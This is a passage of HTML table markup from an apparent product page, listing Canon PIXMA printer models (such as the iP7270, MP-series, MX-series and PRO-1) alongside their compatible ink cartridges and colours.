(Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â 